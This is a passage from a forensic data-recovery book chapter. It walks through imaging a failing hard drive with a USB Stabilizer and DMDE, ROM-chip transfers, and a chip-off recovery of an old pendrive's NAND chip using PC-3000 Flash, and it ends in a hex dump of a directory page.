would be the USB stabilizer. This tool is the “bigger brother” of the Guardonix writeblocker and it
allows you a bit more control. It can be also used with firmware-tools so if you are thinking about
data recovery this would be my recommendation for the lowest you should go.
If not used for data recovery the USB Stabilizer works as a USB-writeblocker and as you may know
basically every storage device can be adapted to USB. So, it you are starting out in forensics this is
the tool which gives you the most options.
That makes this quite an extreme example – you have the lowest-end tool and a data recovery case
which is at least a medium to a higher difficulty imaging job. So that will be also a good test to see
what the USB Stabilizer can do!
This case also gives me the opportunity to demonstrate another procedure in data recovery. A USB to
SATA conversion for Western Digital drives. This is basically the same procedure as for a PCB-swap,
you just swap a USB-PCB with a SATA-PCB.
Before I explain how that’s done, I want to show you what data is stored in the ROM-chip on the
PCB:
Chapter 12 - Data recovery 235
12.9 - List of firmware modules on a Western Digital ROM chip
As you see on the image the modules 0x30 and 0x47 contain the service-area (SA) translator and
SA adaptive parameters. These two modules make each ROM-chip unique for each drive. That’s
why you have to transfer the ROM-chip from the original PCB to the new PCB.
That is not just valid for WD drives but for each manufacturer!
To check which chip is the ROM-chip I usually search the PCB-Number (2060-######-### Rev X in
terms of WD PCBs) + the word donor in Google Images. This brings usually images from specialized
retailers of donor drives and PCBs. Some of them have marked the ROM-chips on their images.
I validate this also by searching on Google for the datasheet of the marked component. If that is
indeed a SPI flash chip or something like that you have confirmed that this component is the ROM
chip.
There are some PCBs where you have an empty space for the ROM-chip. This mean the data is in
the MCU (micro controller unit) and the ROM-chip gets used in later versions to patch the MCU with
newer code.
In that cases you have to transplant the MCU from the original PCB without a ROM-chip and remove
the ROM-chip from the donor PCB if there is one. Usually, you have also another component on the
PCB which act as a switch to activate the ROM-chip. This have to be also removed.
In case the original PCB has a ROM-chip but the donor PCB doesn’t, you have to transfer the ROM-
chip and the 2nd component used as a switch.
Chapter 12 - Data recovery 236
12.10 - ROM-chip transfer for PCB-swap
This is often needed for imaging as a USB interface is not that stable as SATA but that gets also used
in case a PCB is damaged.
Now I am using a Axagon Fastport2 adapter to connect the HDD with my USB Stabilizer. So, I am
basically reverting the SATA conversion I had done to image the drive with MRT.
The first step is to get the drive to ID. To see if the drive is recognised, I open the Log-Tab and activate
the power supply in the USB Stabilizer Application:
Chapter 12 - Data recovery 237
12.11 - USB Stabilizer Log-tab
If you have a 3.5” drive you can use a USB-dock. In that case you have to activate power first in the
USB stabilizer and then power on the dock.
Then you have to select the drive in DMDE:
Chapter 12 - Data recovery 238
12.12 - DMDE drive selection and USB Stabilizer Settings-tab
I have chosen DMDE²⁷⁶ because the tool is pretty cheap, powerful and it is also great for analysing
filesystems. That make that program a good choice for data recovery and even quite useful for
forensics.
In the Settings-tab of the USB Stabilizer application are controls for the device-type (HDD or SSD)
which effect the handling of resets, the reset type (software, hardware, controller, …) and finally the
read timeout.
So, you have the most important setting for imaging speed and stress-level of the drive as well as
resets which can cause instability issues. That means you have the most basic controls. The checkbox
Turn Off Drive if Inactive is also helpful to prevent that the reallocation of bad sectors will
damage data and the drive before you start another imaging pass. But that only work with 2.5”
drives as they can be directly powered over USB and thus the USB Stabilizer can power them off.
With the Commands-button you can issue resets manually or you can log the S.M.A.R.T. data as I
would suggest before and after forensic date acquisition.
To sum that up so far, you are using here the lowest end data recovery tool with a cheap data
recovery program on a medium until moderate difficult case for professional data recovery tools. A
case which took a 5x more expensive and much more flexible tool over a week to image.
After you select the disk, you see the following initial scan dialog:
²⁷⁶https://dmde.com
Chapter 12 - Data recovery 239
12.13 - DMDE initial scan
DMDE try to read the first sectors and this drive have a bad LBA 0 (MBR) which can’t be read. DMDE
sees that because I have set the USB Stabilizer to report read errors back to the OS so that the
Software can log them correctly.
This is why DMDE displays the following error:
12.14 - DMDE read error
You can select “Ignore all” and cancel the further processing of the partition table. First, you want
to clone the drive and then you run the logical data recovery on the image file.
DMDE allow you to control a few other parameters while imaging. First, you need to set the LBA
range and the target:
Chapter 12 - Data recovery 240
12.15 - DMDE imaging settings - Source and destianation
This dialog should be pretty self-explanatory. DMDE just allow you to create a RAW-image. More
advanced tools will allow you to do create VHD, VHDX or some other kind of sparse-files which
will save you a lot of space on the target drive.
The next settings need to be done in the Parameters-tab:
12.16 - DMDE imaging settings - Parameters and Source I/O Parameters
First, you should create a log-file. This file stores an overview about read, unreadable and skipped
Chapter 12 - Data recovery 241
sectors. You can also select to image in reverse in that dialog. I unchecked Lock the source drive
for copy as the USB Stabilizer act as a writeblocker anyway.
For the 2nd pass you can select here also to retry bad sectors. This make sense because many of the
bad sectors will be retrieved with a longer read timeout.
A click on the Parameters-button opens the 2nd window. Here you can select in the Ignore I/O
Errors-tab which fill-pattern should be used for bad and skipped sectors and how many sectors will
be skipped after a bad sector. This setting allows you to overcome bad areas quicker.
From my experience with that drive, I choose 25600 for the first pass. In MRT I used 256000 in the
first try but I realized that I skip too much sectors and I realised that there are bad areas all over the
surface. So, I was pretty certain that I am not dealing with local issues like a minor scratch. That’s
why I lowered the skipped sectors on MRT after the 15% or 20% mark also to 25600.
I still keep it quite big for the first pass as I realized with a much smaller setting that the bad areas
are 20000 – 80000 sectors wide – so 25600 was a good size to skip them in 1 to 4 steps. As I told - get
the low hanging fruits first because you never know if the drive may die on you in the first pass!
DMDE shows you the total number of read and skipped LBAs:
12.18 - DMDE imaging progress
The Action-button let you cancel the imaging or change the I/O settings while you imaging. That
let you finetune skip-settings on the fly.
The Sector Map-tab shows the imaging progress:
Chapter 12 - Data recovery 242
12.18 - USB Stabilizer first imaging pass
You see here very well how the imaging works – the spikes where the drive read with decent speed
is broken up by bad areas which got skipped.
For the 2nd pass I use the following settings:
Chapter 12 - Data recovery 243
12.19 - DMDE imaging settings - Source and destianation
With MRT I had used 3 passes – one with 2560 sectors which got skipped and a 2 or 3 second timeout
instead of 500ms and then a 3rd imaging pass with sector by sector reading reverse in PIO mode
and 10 seconds read timeout.
Here I don’t have PIO and I expect the 2nd pass to end in the middle of the night or early morning
which would throw my time comparison with MRT totally off.
I decided to go straight away with 2560 sectors skip, 10 seconds of read timeout and I read the skipped
sectors in reverse. This will read until the next bad sector occurs and mark all between the first and
first found bad sector in reverse reading as bad. This is not perfect but it will get the job somehow
done.
The imaging is occasionally painfully slow but I read basically most of the sectors:
Chapter 12 - Data recovery 244
12.20 - USB Stabilizer second imaging pass
Finally, the USB Stabilizer and DMDE did image the first 10% of the drive in a bit more then 1,5
days and my 1 for 2 passes “hack” did cause a few more bad sectors then MRT delivered in almost
exactly 1 day.
The whole job would run approximately 16-17 instead of 10 days, which is really good for a tool
like that. I still have maybe some room for improvement but I need to say I am impressed again by
DeepSpar’s USB Stabilizer!
Last but not least I would recommend cooling of a drive which have to work 24h per day for multiple
days to get imaged. An old case-fan and an old power-supply of a SATA to USB converter cable does
this job in my lab.
Chapter 12 - Data recovery 245
Flash drive data recovery
Storage devices based on flash-memory need to be handled differently. To understand how data
recovery for such devices works you need to understand how that devices function and how the
manufacturers deal with certain limitations of that technology.
Flash drives are faster because there are no moving parts and this also eliminates any kind of
mechanical failure or mechanical degradation over time. The data is stored in memory-cells in the
form of an electric charge. These cells degrade as data is written to them. That means the vendors
have to come up with some clever ideas to prevent flash-drives from failing too soon. Strongly
generalized these measures are:
• Wear leveling which ensures that writes are distributed evenly across all memory cells
• Obfuscation/randomisation of data to ensure there are no patterns which can cause an uneven
wear within a memory-page (a group of memory-cells and the smallest unit which gets written
to).
• A good supply of spare space to replace failing memory-cells, pages or blocks (a group of pages
and the smallest unit which can get erased).
Board-level repair
First of all, you need to know if the issue is hardware- or firmware-related. The easiest approach is
to repair a hardware defect like a broken connector or a blown/shorted capacitor. All you need for
this is a soldering-station, tweezers and in the most cases a microscope.
Fully encrypted devices
Then you need to distinguish between fully encrypted and obfuscated devices. Basically, all SSDs
use a full hardware encryption to obfuscate and randomize data. This is also true for a tiny fraction
of pendrives.
To recover data from these devices you need professional data recovery tools like:
• PC-3000 UDMA²⁷⁷/Express with SSD plug-in (does not support NVMe SSDs)
• PC-3000 Portable III²⁷⁸ with SSD plug-in (also supports NVMe SSDs)
• MRT Express²⁷⁹ with SSD plug-in (supports just a few SATA SSDs)
The process in a very generalized form is quite easy. You need to short some Pins on the SSD to put
the device in so-called technology mode to allow the data recovery hardware to upload a so-called
loader.
²⁷⁷https://www.acelab.eu.com/pc3000.udma.php
²⁷⁸https://www.acelab.eu.com/pc-3000-portable-iii-systems.php
²⁷⁹http://en.mrtlab.com/mrt-pro
Chapter 12 - Data recovery 246
This loader will restore access to the data if the device is supported.
The good news is that many devices are nowadays based on the same controllers (e.g. Phison) but
you are still very far from the over 90% success-rate a data recovery lab can reach with HDD cases.
If the device is not supported an investigator could theoretically reverse-engineer the firmware of a
working model and try to find the issue. This is basically what the vendors of data recovery tools
do. To do that for a single case would be an enormous amount of work and this would not fit within
the budget and/or time-frame for a normal investigation. So, if the device is not supported, you are
usually out of luck.
Without a somehow working firmware which handles decryption of data and the translation from
LBA addresses to the correct memory location you are not able to get any data at all.
Chip-off data recovery
Most pendrives and memory-cards do not have hardware-encryption. This is the reason why that
devices can be handled in a so-called chip-off data recovery. As the name suggest memory chips get
removed and you are going to read the data directly from the NAND chips.
If you do so, you have to reverse the things which are done to the data when recording. This is
usually the job of the controller but if you are doing a chip-off you skip the controller and have to
do his work yourself.
I will demonstrate the process with PC-3000 Flash²⁸⁰ and a pendrive chip-off recovery. I choose PC-
3000 Flash because Ace Lab do offer the best support in the data recovery field and PC-3000 Flash
comes with a large database of already known working solutions.
This makes it much easier to get started!
The only available alternative is VNR from Rusolut²⁸¹. This tool doesn’t offer a database with already
known solutions but the tool is very sophisticated and powerful.
The third vendor (Flash extractor) went out of business and the tool is just available used and there
is no professional support or further development anymore. That’s why I would not recommend
that at all.
The process is basically on all tools the same but the way how to handle a case are different. If you
understand the general process, you will be able to work with each tool!
Desoldering and preparation
First you have to desolder the memory chip:
²⁸⁰https://www.acelab.eu.com/pc3000flash.php
²⁸¹https://rusolut.com/
Chapter 12 - Data recovery 247
12.21 - pendrive with one NAND chip and USBest controller
This is a very old USB pendrive with a USBest controller (model UT163-T6). Since the controller
model was hard to read, I used a little trick. I painted the surface of the controller with a paint pen
and then carefully cleaned the surface with a swab dipped in 99% isopropyl alcohol. After this only
a little paint remains in the recesses on the controller and the text is very easy to read.
Here you have a TSOP48 chip. This package has 48 legs (24 on each side) and is by far the most
commonly used design for NAND chips. This is simply due to the fact that this design does not
require any special additional equipment for pick-and-place machines and thus saves manufacturers
additional investments.
For desoldering I use my Yihua YH-853AAA all-in-one soldering station:
Chapter 12 - Data recovery 248
12.22 - Yihua YH-853AAA with pendrive after desoldering of the chip
This soldering station offers a soldering iron, a preheating plate and a hot air nozzle in one.
For small boards such as USB sticks or SD memory cards, I usually use a “third hand” to hold the
boards. This makes it easier to fix the small boards in the right place.
First, I activate the preheating plate and let it heat up to 180°C. At the same time, I put a little flux
on the contacts and as soon as the 180°C has been reached, I activate the hot air nozzle with about
200°C for 30-40 seconds.
I do not use an attachment for the hot air nozzle for larger components like this TSOP48 chip. For
TSOP48 chips, there are also special attachments that primarily direct the hot air to the legs. I would
also recommend these to beginners to make the process even gentler.
The procedure I described is intended for BGA chips that do not have legs, but pads on the underside
of the chip. But I also handle TSOP chips this way…
Then I swing the hot air nozzle away and use the soldering iron with a little lead-containing solder to
lower the melting point of the lead-free solder on the board. To do this, I quickly solder the contacts
at a set temperature of 400°C with leded solder.
Then I swing the hot air nozzle back, I increase the temperature to about 380°C at my hot air station
and I use a fairly low air flow to avoid blowing small components off the board!
To pick up the chip I use then a vacuum lifter.
Chapter 12 - Data recovery 249
I recommend you to practice this with an old pendrive. If you can solder the chip several times in
and out with the stick still working afterwards, you are ready for the first real cases.
Do not take the values I mentioned as given, but find the right values for your soldering station!
The temperature specifications depend on the sensor and the position of the sensor. I know from an
experiment with a thermal imaging camera that a setting of 400°C corresponds to about 350°C at the
tip of my soldering iron.
Depending on the distance and other factors, the set temperature is very different from the
temperature acting on the chip. In general, you want to solder so hot that you can remove the
chip in a few seconds and not heat the chip at 300°C for multiple minutes.
Therefore, it is important to find suitable settings on your own soldering station. But you don’t want
to solder so hot that chips get damaged!
With more expensive soldering stations, the set values will tend to be closer to the actual values. My
Yihua station is a quite cheap but also very compact model and has served me well for years. You are
welcome to invest a 4-digit number into Weller or JBC equipment, but for the amount of soldering
work I do, it would be overkill.
A training phase to get to know the equipment will be necessary even with high-quality soldering
stations…
As soon as the chip is removed, it is necessary to clean the contacts. I use a small piece of desoldering
wick that I cut off. Copper is a good conductor of heat and you want to clean the contacts with the
desoldering wick and not heat 3 meters of the desoldering wick. That’s exactly why I cut off a 1.5 –
2cm long piece.
I place the chip on a silicone solder mat, put some flux on the legs and then I put the desoldering
wick on the legs. Then I use the soldering iron with the previously mentioned 400°C as temperature
setting and a slightly wider chisel tip to transfer as much heat as possible.
Do not try to push the wick back and forth – you would risk to bend the legs. Also make sure to
heat the desoldering wick continuously before removing it so that it does not adhere to one of the
legs.
If you have problems to detach the desoldering wick from the legs, don’t use force, but use the hot air
nozzle at 300°C to “help” the soldering iron. This allows you to remove the desoldering wick within
seconds.
With BGA chips, the desoldering wick can be easily pushed over the pads, if it has the right
temperature. Do not apply force here either! The pads are torn off faster than you think! As soon as
the right temperature is reached and enough flux is used, the piece of desoldering wick glides over
the contacts as if by itself.
After both sides of the legs are free of solder, I use a very soft toothbrush and a few drops of isopropyl
alcohol to clean the chip roughly. Then I use cotton swabs dipped in IPA to clean the silicone mat
and the chip.
Chapter 12 - Data recovery 250
Afterwards the chip can be inserted into the reader. Alternatively, you can tin the matching adapter
board and solder the chip. I always use lead-containing solder to keep the soldering temperature a
little lower.
If a TSOP48 chip is not detected in the corresponding adapter, this may be due to residues of rosin-
containing fluxes or oxidation of the legs. In this case, it is often helpful to place the chip with the
legs facing down on a hard surface and carefully clean the top of the leg with a scalpel:
12.23 - Cleaning TSOP-48 legs with a scalpel
For data recovery, I note the last two digits of the case number. For this book I used single-digit
numbers for the examples in order not to confuse these chips with a real data recovery! Each chip
has a marking for the Pin 1, a Latin number for the case and a roman numeral for the chip position
on the PCB.
Practical example - chip-off recovery for an old 512MB pendrive
Once the chips have been prepared, you can read them with PC-3000 Flash. To do this, you must first
generate a new case. When you start the software of PC-3000 Flash, you see the following dialog:
Chapter 12 - Data recovery 251
12.24 - Select adapter dialog
Here you tick Use adapter and then you click OK.
In the next step you are asked for a folder name of the case:
12.25 - Setting the case name
Chapter 12 - Data recovery 252
I always name the folder with the case number and the prefix DR for data recovery and FI for forensic
investigation.
Here I use DR_12345 as an example.
Then you have to determine where the data should be read from:
12.26 - Device selection dialog
Here you can either select the PC-3000 Flash Reader (first line) or a USB device like the DeepSpar
USB Sabilizer shown here.
So, you can easily use PC-3000 Flash also for a logical data recovery.
Also, you could load a dump from a file.
I use the USB chip reader for this example. Confirm the selection with Next>.
In the next step, you need to provide the key data of the case:
Chapter 12 - Data recovery 253
12.27 - Set controller and number of chips
The translation from Russian is not always perfect. The first indication Number of chip should
actually be called “Number of chips” because you have to specify the number of chips and not the
position of the chip you are going to read.
Once set, this information can no longer be adjusted!
The specification of the controller is important later to search in the Solution Center for an already
known solution…
By clicking on Next> you confirm these entries.
In the last step, you can enter more information for the case:
Chapter 12 - Data recovery 254
12.28 - Set additional informations/notes
By clicking OK you create the case and open it immediately:
12.29 - Read the chip ID
Chapter 12 - Data recovery 255
In this case, you see only one chip as you stated before. If you had specified a larger number of chips,
you would now have several chips in the list that you would need to fill with data.
PC-3000 Flash is very context-menu driven.
The first step in creating the dump is to read the ID of the chip. Via the ID, PC-3000 Flash recognizes
which settings are necessary for reading the chip.
To do this, you right-click on 1 – Unknown chip. This brings up the context-menu as shown above.
In it you select the entry Read chip ID and then the following dialog appears:
12.30 - Chip ID found
The appropriate values have already been set by the adapter you used and usually there is no need
to activate further options.
The read process starts automatically. All possible modes get tried. If the ID is read successfully, the
window disappears.
If there are read errors, they are displayed as red lines. There are partial read errors in which some
values are found and the full read errors shown below.
Not a single value is determined for Chip ID, Parts or Base:
Chapter 12 - Data recovery 256
12.31 - Chip ID reading error
In this case, you should clean the chip with a scalpel as previously mentioned. If that did not help,
the chip is most probably dead and there is no way to recover the data.
If the ID is recognized, the chip name changes:
12.32 - Read chip
With a right-click you get the context-menu again and then you need to select Read chip to start
the first reading pass:
Chapter 12 - Data recovery 257
12.33 - Reading mode selection dialog
The dialog shown above allows you to select the reading mode. The Direct reading mode is only
intended for testing the reading options and should therefore only be used in exceptional cases.
Normally you select Reading to file dump to write the data from the chip to a file. Then you
confirm this with Select.
12.34 - Reading parameters dialog (normal)
In this step, you choose the reading speed and some more settings.
You get the advanced settings by clicking on Extended>>:
Chapter 12 - Data recovery 258
12.35 - Reading parameters dialog (extended)
Here you can already perform some analysis or verification of the data while reading or restart the
chip with a power reset after a read error.
I’m not a fan of running the analyses while copying the data. Auto-verification may make sense for
some chips because the data is read several times and then the most likely result is stored.
As a rule, the ECC correction and re-reading works better!
A click on Apply starts reading:
Chapter 12 - Data recovery 259
12.36 - Reading process running
Then you have to correct the data which you just read by performing the ECC correction and, if
necessary, re-reading the uncorrectable pages using special re-reading methods.
To do this, you open the newly added item Results of preparation in the left pane and then click
on the item 0001 Transformation graph.
The transformation graph is the area in which you will work from now on. This is where all
transformations are carried out with which you go from a physical to a logical image.
Chapter 12 - Data recovery 260
To trigger the ECC correction, right-click on entry 0 in the Items column. If you have previously
defined two or more chips, you would now see a sub-column with the chip-number (0, 1, …) in
Items per chip. Then you would have to perform the ECC correction and re-reading for each chip
individually.
To start the ECC correction you select Data correction via ECC -> ECC autodetection:
12.37 - Start ECC correction
This analysis may take some time depending on the size of the dump.
If the ECC data cannot be determined during the fast analysis, you will be asked whether a complete
analysis should be performed.
Once ECC data is found, you see the following question:
12.38 - ECC data found dialog
After clicking the Yes button, you see the following in the Log tab:
Chapter 12 - Data recovery 261
>>>>>>>>>>>>>>>>>>> Detect ECC for sector = 528 bytes
Check ECC process ****************
start time 9/4/2022 4:28:43 PM
finish time 9/4/2022 4:28:45 PM
------------------------------------------------------------------
total time 00:00:02
******************************************************************
The information that a sector is 528 bytes long will be needed later. I suggest to note such things
as the log may get very long over time. That’s why I have a notebook and a pen next to each data
recovery workstation!
Then you can perform the re-reading based on the ECC data. Only pages that could not be corrected
during the ECC correction are re-read.
To do this, right-click on item 0 and then on Tools -> Read Retry -> ReadRetry mode checking:
12.39 - Find re-reading methods
After that, you get a list of possible read retry modes:
Chapter 12 - Data recovery 262
12.40 - Re-read method list
This list is sorted by probability. Here you can see on the rating of 1% that this very old chip does
not support special re-reading commands or that the appropriate commands for this chip are not
available in PC-3000 Flash.
In such a case, I then check how many sectors are faulty.
To do this, right-click again on item 0 and then select the entry Map from the context menu:
12.41 - Start map building
Here you see a pictorial representation of all read pages. To see the bad sectors, you click on the
down arrow next to ECC in the toolbar and then you select the entry Create submap use ECC info:
Chapter 12 - Data recovery 263
12.42 - Start building submap based on ECC info
Then you see the following window:
12.43 - Select parameters for submap
Here you select Invalid sectors and click OK.
Then you get a graphical overview of the bad sectors:
12.44 - Uncorrected sectors
In this case, there are only 4 bad sectors or 1 page.
In the next step, you have to check with such an old pendrive whether a scrambling of the data has
taken place or not.
This scrambling can be done in the following three ways:
Chapter 12 - Data recovery 264
1. Bitwise inversion
2. XOR
3. Encryption
To check whether the data is scrambled, right-click on entry 0 under Items and then select the entry
Raw recovery:
12.45 - Start RAW recovery
The following window will appear. Here you can initiate the search for files by clicking on the play
button in the toolbar. After that, you can look at the data sorted by file type:
12.46 - RAW recovery results
Since PC-3000 found some files, there is no scrambling. However, when you open an image, the file
is damaged:
Chapter 12 - Data recovery 265
12.47 - Image-fragments in wrong order
The data is readable but the order of the data is completely wrong because of the wear leveling!
Next, look at the entries under FAT folder. This is the data used to define a folder in the FAT
filesystem. These entries are usually quite short and could fit into a page.
This makes this data ideal for use in the Page Designer. To do this, right-click on the entries in the
list and then select Add to search results:
12.48 - Add search results
The following dialog appears:
Chapter 12 - Data recovery 266
12.49 - Define results ID
Confirm the ID with OK.
Then everything is ready for splitting the pages into sectors with the page designer.
Open the page designer again via the context-menu:
12.50 - Open page designer
The following window will appear:
12.51 - Page designer window
Here you can see the content of a page in the left pane. To the right, you can define and edit the
division of pages into individual sectors. Just below that, you find the previously added search results.
As soon as you click on one of the search results, you see the first page in which the data of this file
is stored.
A page contains a certain number (4, 8, 16, 32, … ) of sectors in the so-called data area (DA) and some
Chapter 12 - Data recovery 267
additional bytes. These additional bytes are called the service area (SA) and they contain ECC data
and markers.
Each page conversion must consist of sectors with 512 bytes in the data area and at least 2 bytes in
the service area. So, the smallest possible fragments are 514 bytes per sector. Of course, some data
areas can also follow each other directly and the service areas for the individual sectors are located
at the end of the page or in one block after 2 or 4 sectors. In addition, one of the service areas can
be larger and contain both service data for the sector and the entire page.
However, the unequal division of the page into sectors with different service areas of different sizes
is rather the exception. As a rule, the service areas of all sectors are the same size!
The de-scrambling of the data with XOR depends on the page layout and therefore often no manual
page conversion has to be carried out. This is automatically detected after the application of XOR and
suggested to the user.
Now let’s take a closer look at a page:
0x0000 2E20 2020 2020 2020 2020 2010 0000 4CA1 . ...L¡
0x0010 B54A B54A 0100 4CA1 B54A 5FAA 0000 0000 µJµJ..L¡µJ_ª....
0x0020 2E2E 2020 2020 2020 2020 2010 0000 4CA1 .. ...L¡
0x0030 B54A B54A 0000 4CA1 B54A 0000 0000 0000 µJµJ..L¡µJ......
0x0040 4174 0061 0072 0067 0065 000F 0068 7400 At.a.r.g.e...ht.
0x0050 2E00 7400 7800 7400 0000 0000 FFFF FFFF ..t.x.t.....ÿÿÿÿ
0x0060 5441 5247 4554 2020 5458 5420 0000 4CA1 TARGET TXT ..L¡
0x0070 B54A B54A 0100 04A1 B54A 60AA 2300 0000 µJµJ...¡µJ`ª#...
0x0080 416C 006F 0067 0000 00FF FF0F 0000 FFFF Al.o.g...ÿÿ...ÿÿ
0x0090 FFFF FFFF FFFF FFFF FFFF 0000 FFFF FFFF ÿÿÿÿÿÿÿÿÿÿ..ÿÿÿÿ
0x00A0 4C4F 4720 2020 2020 2020 2020 0000 4CA1 LOG ..L¡
0x00B0 B54A B54A 0100 06A1 B54A 61AA 4518 0000 µJµJ...¡µJaªE...
0x00C0 4265 0000 00FF FFFF FFFF FF0F 0050 FFFF Be...ÿÿÿÿÿÿ..Pÿÿ
0x00D0 FFFF FFFF FFFF FFFF FFFF 0000 FFFF FFFF ÿÿÿÿÿÿÿÿÿÿ..ÿÿÿÿ
0x00E0 0173 0065 0073 0073 0069 000F 0050 6F00 .s.e.s.s.i...Po.
0x00F0 6E00 2E00 7300 7100 6C00 0000 6900 7400 n...s.q.l...i.t.
0x0100 5345 5353 494F 7E31 5351 4C20 0000 4CA1 SESSIO~1SQL ..L¡
0x0110 B54A B54A 0100 01A1 B54A 63AA 0040 0000 µJµJ...¡µJcª.@..
0x0120 4164 0075 006D 0070 0000 000F 0068 FFFF Ad.u.m.p.....hÿÿ
0x0130 FFFF FFFF FFFF FFFF FFFF 0000 FFFF FFFF ÿÿÿÿÿÿÿÿÿÿ..ÿÿÿÿ
0x0140 4455 4D50 2020 2020 2020 2010 0000 4CA1 DUMP ...L¡
0x0150 B54A B54A 0100 4CA1 B54A 67AA 0000 0000 µJµJ..L¡µJgª....
0x0160 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0170 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0180 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0190 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x01A0 0000 0000 0000 0000 0000 0000 0000 0000 ................
Chapter 12 - Data recovery 268
0x01B0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x01C0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x01D0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x01E0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x01F0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0200 1345 1345 FFFF D30E 4199 E706 F629 8ACD .E.EÿÿÓ.A™ç.ö)ŠÍ
0x0210 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0220 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0230 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0240 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0250 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0260 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0270 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0280 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0290 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x02A0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x02B0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x02C0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x02D0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x02E0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x02F0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0300 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0310 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0320 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0330 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0340 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0350 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0360 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0370 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0380 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0390 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x03A0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x03B0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x03C0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x03D0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x03E0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x03F0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0400 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0410 1345 1345 FFFF F4C9 7794 01D7 3C7F CEB9 .E.EÿÿôÉw”.×<.ι
0x0420 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0430 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0440 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0450 0000 0000 0000 0000 0000 0000 0000 0000 ................
Chapter 12 - Data recovery 269
0x0460 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0470 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0480 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0490 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x04A0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x04B0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x04C0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x04D0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x04E0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x04F0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0500 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0510 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0520 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0530 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0540 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0550 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0560 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0570 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0580 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0590 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x05A0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x05B0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x05C0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x05D0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x05E0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x05F0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0600 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0610 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0620 1345 1345 FFFF F4C9 7794 01D7 3C7F CEB9 .E.EÿÿôÉw”.×<.ι
0x0630 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0640 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0650 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0660 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0670 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0680 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0690 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x06A0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x06B0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x06C0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x06D0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x06E0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x06F0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0700 0000 0000 0000 0000 0000 0000 0000 0000 ................
Chapter 12 - Data recovery 270
0x0710 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0720 0000 0000 0000 0000 0000 0000 0000 0000 ................
